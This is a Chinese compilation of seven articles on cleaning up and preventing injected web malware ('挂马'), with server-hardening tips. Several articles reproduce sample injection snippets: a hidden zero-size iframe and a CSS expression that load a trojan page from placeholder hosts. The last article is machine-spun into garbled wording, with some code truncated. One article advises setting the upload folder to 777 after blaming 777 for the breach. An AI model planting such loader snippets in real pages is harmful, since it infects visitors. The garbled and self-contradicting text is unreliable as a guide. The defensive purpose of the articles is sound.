以下是小编帮大家整理的如何用IIS防火墙清除“挂马”代码?WEB安全,本文共7篇,供大家参考借鉴,希望可以帮助到您。本文原稿由网友“皮儿”提供。
篇1:如何用IIS防火墙清除“挂马”代码?WEB安全
网站被反复“挂马”,怎么办?很多企业网管经常发现,在清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接之后,过一会又被“入侵者”加上,这些是非常头疼的问题,
其实利用IIS防火墙可以解决这个难题,使用“正则表达式”模式匹配“挂马”代码,从 IIS 中清除“挂马”代码连接。不用修改硬盘 ASP / PHP 文件,不在担心错误修改客户 ASP / PHP 文件,
对于 <script. src=%AA%BB%CC%DD%EE%FF%GG></script> 这样的加密URL连接,只需要使用一个“正则表达式”,即可从IIS中过滤整个服务器中类似的“挂马”代码连接。对于 <iframe. src=www.xxxx.com/muma.htm width=0 height=0></iframe> 这样的,也只需要通过“正则表达式”,即可轻松清除。
另外,IIS防火墙的智能识别标准HTML网页代码,可以对HTML/ASP/PHP/ASP.NET等网页的顶部和底部的“挂马征”代码进行自动清除操作。
篇2:wordpress被挂马及清除可疑的植入代码的方法
我有个用wordpress搭建的CMS网站前些日子被浏览器报受攻击了,谷歌的网站管理也工具也提示,还给出了可疑代码和受影响的文章的地址,以前被攻击的经历,那次与这次不同,只是挂了几个黑链,这次不同,因此只能手动找代码清除了,刚开始网上搜了搜相关事例,有些博主是在数据库里清除的,但我的行不通,因为我的问题不在数据库,而在functions.php文件,
清除wordpress挂马代码:
1.先是登陆谷歌网站管理工具,在“故障诊断”下选择“恶意软件”进入存在问题的网址,随便点击一个有问题的网站,谷歌网站管理员工具就会给出“可疑的植入代码”
注:不要在浏览器中执行!
2.在被挂马博客当前主题的functions.php文件中的,找到与谷歌网站管理员工具给出的可疑的植入代码相同的代码,然后把整个php语句删除掉,我找到的整句代码如下:(蓝色部分)
3.然后保存文件,
注:不能确定的博主,可以拿出当前主题的备份主题的functions.php文件替换掉原来的。此外删除掉后,在谷歌网站管理员工具中申请审核,否则chrome浏览器还会报警告。
PS:我对挂马和代码这些了解不是很清楚,只是参照谷歌网站管理工具给出的相应的可疑植入代码进行清理,合理性有待考察。
篇3:用IIS建立高安全性Web服务器
用IIS建立高安全性Web服务器
因为IIS(即Internet Information Server)的方便性和易用性,使它成为最受欢迎的Web服务器软件之一。但是,IIS的安全性却一直令人担忧。如何利用IIS建立一个安全的Web服务器,是很多人关心的话题。
构造一个安全系统
要创建一个安全可靠的Web服务器,必须要实现Windows 和IIS的双重安全,因为IIS的用户同时也是Windows 2000的用户,并且IIS目录的权限依赖Windows的NTFS文件系统的权限控制,所以保护IIS安全的第一步就是确保Windows 2000操作系统的安全:
1. 使用NTFS文件系统,以便对文件和目录进行管理。
2. 关闭默认共享
打开注册表编辑器,展开“HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters”项,添加键值AutoShareServer,类型为REG_DWORD,值为0。 这样就可以彻底关闭“默认共享”。
3. 修改共享权限
建立新的共享后立即修改Everyone的缺省权限,不让Web服务器访问者得到不必要的权限。
4. 为系统管理员账号更名,避免非法用户攻击。
鼠标右击[我的电脑]→[管理]→启动“计算机管理”程序,在“本地用户和组”中,鼠标右击“管理员账号(Administrator)”→选择“重命名”,将管理员账号修改为一个很普通的用户名。
5. 禁用TCP/IP 上的NetBIOS
鼠标右击桌面上[网络邻居] →[属性] →[本地连接] →[属性],打开“本地连接属性”对话框。选择[Internet协议(TCP/IP)]→[属性]→[高级]→[WINS],选中下侧的“禁用TCP/IP上的NetBIOS”一项即可解除TCP/IP上的NetBIOS。
6. TCP/IP上对进站连接进行控制
鼠标右击桌面上[网络邻居] →[属性] →[本地连接] →[属性],打开“本地连接属性”对话框。选择[Internet协议(TCP/IP)]→[属性]→[高级]→[选项], 在列表中单击选中“TCP/IP筛选”选项。单击[属性]按钮,选择“只允许”,再单击[添加]按钮,只填入80端口。
7. 修改注册表,减小拒绝服务攻击的风险。
打开注册表:将HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters下的SynAttackProtect的值修改为2,使连接对超时的响应更快。
保证IIS自身的安全性
IIS安全安装
要构建一个安全的IIS服务器,必须从安装时就充分考虑安全问题。
1. 不要将IIS安装在系统分区上。
2. 修改IIS的安装默认路径。
3. 打上Windows和IIS的最新补丁。
IIS的安全配置
1. 删除不必要的虚拟目录
IIS安装完成后在wwwroot下默认生成了一些目录,包括IISHelp、IISAdmin、IISSamples、MSADC等,这些目录都没有什么实际的作用,可直接删除。
2. 删除危险的IIS组件
默认安装后的有些IIS组件可能会造成安全威胁,例如 Internet服务管理器(HTML)、SMTP Service和NNTP Service、样本页面和脚本,大家可以根据自己的需要决定是否删除。
3. 为IIS中的文件分类设置权限
除了在操作系统里为IIS的文件设置必要的权限外,还要在IIS管理器中为它们设置权限。一个好的'设置策略是:为Web 站点上不同类型的文件都建立目录,然后给它们分配适当权限。例如:静态文件文件夹允许读、拒绝写,ASP脚本文件夹允许执行、拒绝写和读取,EXE等可执行程序允许执行、拒绝读写。
4. 删除不必要的应用程序映射
ISS中默认存在很多种应用程序映射,除了ASP的这个程序映射,其他的文件在网站上都很少用到。
在“Internet服务管理器”中,右击网站目录,选择“属性”,在网站目录属性对话框的“主目录”页面中,点击[配置]按钮,弹出“应用程序配置”对话框,在“应用程序映射”页面,删除无用的程序映射。如果需要这一类文件时,必须安装最新的系统修补补丁,并且选中相应的程序映射,再点击[编辑]按钮,在“添加/编辑应用程序扩展名映射”对话框中勾选“检查文件是否存在”选项。这样当客户请求这类文件时,IIS会先检查文件是否存在,文件存在后才会去调用程序映射中定义的动态链接库来解析。
5. 保护日志安全
日志是系统安全策略的一个重要环节,确保日志的安全能有效提高系统整体安全性。
● 修改IIS日志的存放路径
默认情况下,IIS的日志存放在%WinDir%\\System32\\LogFiles,黑客当然非常清楚,所以最好修改一下其存放路径。在“Internet服务管理器”中,右击网站目录,选择“属性”,在网站目录属性对话框的“Web站点”页面中,在选中“启用日志记录”的情况下,点击旁边的[属性]按钮,在“常规属性”页面,点击[浏览]按钮或者直接在输入框中输入日志存放路径即可。
● 修改日志访问权限,设置只有管理员才能访问。
通过以上的一些安全设置,相信你的Web服务器会安全许多。
篇4:打造更安全的防火墙WEB安全
打造更安全的防火墙
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,
就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁, 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 250875628
端 协议 应用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6(非端口) IP协议
8(非端口) IP协议
那么,我们根据自己的经验,将下面的端口关闭
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[冲击波]
4489
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了
篇5:织梦CMS挂马漏洞分析解决方案WEB安全
1.最笨的一种应该是直接修改生成的index.htm文件,一般在源代码底部加入一段
2.聪明一点的会修改模板文件,把templets目录下的主要文件源代码同样底部加入
3.稍微厉害一点的会把
4.还有一种是调用.js文件,混在网页中间,利用大多数网页都会有JS调用作为掩护,仔细查找就可以;
5.更高级一点的就是这次我遇到的,模板首页都会调用一个dedeajax.js的文件,他把代码加入到这里面去;
以上是比较常见的一些情况,然后仅仅是删除了木马代码而已,更重要的是要找到根源才行,这样才不会被再次中毒,
织梦CMS挂马漏洞分析解决方案WEB安全
,
根据上次官方发布的解决漏洞办法分析,大多数都是利用会员注册的上传文件漏洞伪装成rar,zip等文件把后门程序上传,从而获得管理权限。所以清楚了网页里的代码之后就要注意查找这些后门程序,大部分都是.php结尾的文件,打开之后显示一堆乱码,直接在upimg里的userup目录查找,如果你网站开的越久内容越多查找起来可能会比较麻烦,可以下载到本地用资源管理器查找*.php文件,找到一个删除一个。
最后的建议就是彻底关闭会员注册功能,或者会员上传功能,大部分个人网站都是用DEDECMS做一个内容发布的网站,很少有需要会员上传什么东西的,所以这个功能其实根本就没有用到,与其这样不如彻底关闭。一个搞安全的朋友告诉我最安全的网站就是全html的网站,能减少程序功能就尽量减少。
篇6:网站服务器一直被挂马的解决办法WEB安全
网站服务器总是被挂木马,网站的头部被注入了大量的js代码,弄了好久终于解决了,问题的根源是在配置lampp服务器的时候,为了简单方便,给网站根目录赋予了777权限,给了 可趁之机。解决问题的思路就是把权限配置合理。具体方法如下:
1.重新安装linux系统:后台选择32bit ubunt
2.下载xampp服务器: wget url
3.解压xampp: tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt
备注:压缩文件用tar -zcvf ***.tar.gz 文件夹
4.启动服务器:/opt/lampp/lampp start
5.设置安全密码:/opt/lampp/lampp security
6.从其他服务器上拷贝备份文件:scp root@ip:文件位置/文件名 文件名(文件已经备份过)
7.恢复etc/extra/httpd-vhosts.conf,
8.修改extra/httpd.conf,最后一行加入httpd-vhosts.conf
9.修改数据库导入数据文件大小的限制:extra/php.ini
10.新建用户:adduser ×××
11.新建用户组:addgroup ×××
12.给已有的用户增加工作组 usermod -G groupname username
13.改变htdocs文件夹下网站所属用户 chown -R user file,以此用户名和密码来登录FTP,
14.改变网站中上传图片目录的权限为777:chmod -R 777 图片文件夹
篇7:揭秘 所用的CSS代码挂马方法
跟着Web2.0的普及,各种网页殊效用得越来越多,这也给 一个可乘之机,他们发现,用来制作网页殊效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式实在是从防范E挂马的CSS代码演变而来。
安天实验室阿楠:安全工程师,从事病毒分析多年。
网站挂马的手段最初非常单一,但是跟着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代 的最爱。有很多非常知名的网站都被 用CSS挂马入侵过。
在我印象中,记忆最深刻的一次是 CSS挂马。当时, 推出没有多久,就有很多百度用户收到了类似“哈,节日快乐呀!强烈热闹庆祝2008,心情好好,记住要想我!hi.baidu.com/XXXXX”的站内动静。
因为网址是 的网址,很多用户以为不会存在安全题目,加上又有可能是自己朋友发来的,因此会绝不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继承传播。
因为蠕虫扩散非常严峻,终极导致 不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是 CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台静静运行并发送大量伪造信息。
我建议大家在点击目生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好仍是使用一些带网页木马拦截功能的安全辅助工具。
为什么选择CSS挂马?
在Web1.0时代,使用E挂马对于 而言,与其说是为了更好地实现木马的躲藏,倒不如说是无可奈何的一个选择。在简朴的HTML网页和缺乏交互性的网站中, 可以利用的手段也非常有限,即使采取了复杂的伪装,也很轻易被识破,还不如E来得直接和有效。
但如今交互式的Web2.0网站越来越多,答应用户设置与修改的博客、SNS社区等纷纷泛起。这些互动性非常强的社区和博客中,往往会提供丰硕的功能,并且会答应用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。
小百科:
CSS是层叠样式表(CascadingStyleSheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。
在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执行。这就犹如你去一家着名且证照齐全的大病院看病,你非常信任病院,但是你所看的门诊却已经被庸医外包了下来,并且打着病院的名义利用你的信任成功欺骗了你,
但是当你事后去找人算账时,病院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。
CSS挂马攻防实录
攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。
方式1:
Body
“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合t代码让网页木马静静地在用户的电脑中运行。
那如何将这段CSS恶意代码挂到正常的网页中去呢? 可以将天生好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。
小百科:
使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,犹如使用DIV对象那样精确地设置大小。
方式2:
Body
background-image: url(t:open(“www.X.com/muma.htm”,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”))
方式1的CSS挂马技术,在运行时会泛起空缺的页面,影响网页访问者正常的访问,因此比较轻易发现。不外在方式2中的这段代码,使用了t的Open开窗,通过新开一个躲藏的窗口,在后台静静地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更加隐蔽。
防网络服务器被挂马,通常会泛起防病毒软件告警之类的信息。因为漏洞不断更新,挂马种类时刻都在变换,通过客户真个反映来发现服务器是否被挂马往往疏漏较大。准确的做法是常常检查服务器日志,发现异常信息,常常检查网站代码,使用网页木马检测系统,进行排查。
目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不外假如你选择过滤CSS的话,首先需要注意自己的相关网页是否有CSS的内容,因此我们仍旧首推用阻断方式来防范CSS。阻断代码如下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=”\");
将外域的木马代码的src重写本钱地IE404错误页面的地址,这样,外域的t代码不会被下载。不外阻断方式也有生成致命的弱点,弱点的秘密我们将于下次揭晓。
